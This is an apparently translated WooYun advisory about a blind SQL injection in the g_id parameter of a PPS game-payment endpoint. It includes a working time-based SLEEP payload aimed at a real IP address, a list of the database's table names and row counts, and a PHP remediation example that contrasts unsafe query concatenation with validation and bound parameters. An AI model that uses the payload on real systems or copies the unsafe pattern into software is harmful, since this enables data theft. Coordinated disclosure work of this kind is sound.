
Vulnerability Summary

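Bug ID: wooyun-2015-0157389

Title: MySQL blind injection on a PPS site

Vendor: PPS网络电视 (PPS Network TV)

Author: hecate

Submitted: 2015-12-01 19:09

Fixed: 2016-01-16 10:14

Publicly disclosed: 2016-01-16 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. If you have questions or need help, contact [email protected]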



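Vulnerability Details

Disclosure status:

2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public

Brief description:

More than 70,000 users

Detailed description:

The g_id in this link is passed through intval: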
http://211.151.142.213/gamepay/game_pay_main/index?g_id=314&sidebar_id=2&tid=8001&server_type=106649
The g_id parameter at the address below, however, has no intval, probably an oversight:
http://211.151.142.213/gamepay/game_pay_main/check_game_user?g_id=615&user_name=11111111&server_id=257027&t=0%2E5307019442298461

http://211.151.142.213/gamepay/game_pay_main/check_game_user?g_id=615 AND (SELECT * FROM (SELECT(SLEEP(5)))wyLc)&user_name=11111111&server_id=257027&t=0.5307019442298461



Proof of vulnerability:

Database: g_pps_tv
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| game_active_awards_prize_log | 458129 |
| game_active_awards_log | 447847 |
| game_sync_log | 160682 |
| game_weixin_user | 77937 |
| game_news | 48045 |
| game_server_map | 30185 |
| game_server | 29324 |
| game_apk_log | 27271 |
| game_active_awards_pay_log | 25272 |
| game_active_awards_lucky_draw | 20228 |
| game_active_gift_get_log | 19743 |
| game_server_info_mobile | 17735 |
| game_server_info | 12450 |
| game_active_appointment_log | 9173 |
| pps_bbs_ban_user | 7085 |
| game_homepage | 6082 |
| game_action_log | 5316 |
| game_info | 3948 |
| game_info_mobile | 3597 |
| game_apk_info_log | 3539 |
| single_game_id_mapping | 2596 |
| developer_user | 1452 |
| pps_company_info | 1320 |
| single_game_apk_info | 1102 |
| developer_action_log | 1088 |
| game_mobile_igame_config | 416 |
| websql_fav | 414 |
| websql_log | 414 |
| game_info_web | 347 |
| production_topics_game | 314 |
| pps_game_company_relation | 312 |
| game_webinfo | 305 |
| game_cps_import | 276 |
| pps_weixin_keywords_reply | 261 |
| game_active_awards_prize | 201 |
| game_new_cate | 201 |
| developer_game_check_progress | 198 |
| developer_game_dock_info | 198 |
| developer_game_evaluation | 198 |
| developer_game_info | 198 |
| game_web_interface_config | 132 |
| customer_notice | 130 |
| game_active_awards | 128 |
| game_active_awards_rules | 128 |
| game_active_config | 71 |
| game_apk_type | 69 |
| game_active_api_log | 50 |
| production_menu | 48 |
| game_active_gift_condition | 38 |
| game_active_gift_config | 25 |
| sdk_mobile_game | 22 |
| production_topics | 19 |
| developer_msg_tpl | 18 |
| game_info_html5 | 12 |
| game_active_awards_physical | 11 |
| game_active_condition | 10 |
| game_stat_position | 10 |
| game_active_gift_condition_tpl | 3 |
| game_active_tpl | 3 |
| game_qq_sdk | 3 |
| game_singlegame_qudao_relation | 3 |
| developer_document | 2 |
| pps_qudao_game_alias | 2 |
| game_single_qudao_special | 1 |
+--------------------------------+---------+

Remediation:

intval

Copyright notice: when reposting, please credit the source hecate@乌云 (WooYun)
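
The remediation above, as an added example in PHP that is not part of the original report or the vendor's code: it puts the unvalidated `g_id` handling next to `intval`, and then next to strict validation combined with a bound parameter. The function names, the `g_id` column in `game_info`, and the in-memory SQLite database are assumptions made for illustration. Note that `intval` silently truncates the tampered value to `615` and serves the request, while the stricter check rejects it.

```php
<?php
// Added example; function names and schema are hypothetical, not the vendor's code.
declare(strict_types=1);

// Before: g_id goes into the SQL text unmodified, as in check_game_user.
function buildQueryUnsafe(string $gId): string
{
    return "SELECT g_id FROM game_info WHERE g_id = " . $gId;
}

// The report's fix: intval() keeps the leading digits and drops the rest.
function buildQueryIntval(string $gId): string
{
    return "SELECT g_id FROM game_info WHERE g_id = " . intval($gId);
}

// Stricter: reject anything that is not a positive decimal integer.
function parseGameId(string $gId): int
{
    $id = filter_var($gId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('g_id must be a positive integer');
    }
    return $id;
}

// Validation plus a bound parameter: the value never becomes SQL text.
function gameExists(PDO $db, string $gId): bool
{
    $stmt = $db->prepare('SELECT 1 FROM game_info WHERE g_id = :g_id');
    $stmt->bindValue(':g_id', parseGameId($gId), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchColumn() !== false;
}

// Constructed input: the g_id value from the report's proof-of-concept URL.
$tampered = '615 AND (SELECT * FROM (SELECT(SLEEP(5)))wyLc)';
echo buildQueryUnsafe($tampered), "\n"; // the appended condition reaches the query
echo buildQueryIntval($tampered), "\n"; // coerced to 615, request is still served

// Constructed database: in-memory SQLite stands in for the real MySQL backend.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE game_info (g_id INTEGER PRIMARY KEY)');
$db->exec('INSERT INTO game_info (g_id) VALUES (615)');
var_dump(gameExists($db, '615'));
try {
    gameExists($db, $tampered);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Rejecting the malformed value, rather than coercing it, also gives the application a place to log tampered requests against numeric parameters.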


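Vulnerability Response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-12-02 10:13

Vendor reply:

Thank you for your interest in iQIYI PPS (爱奇艺PPS). The vulnerability is confirmed, and we will fix it as soon as possible. :)

Latest status:

None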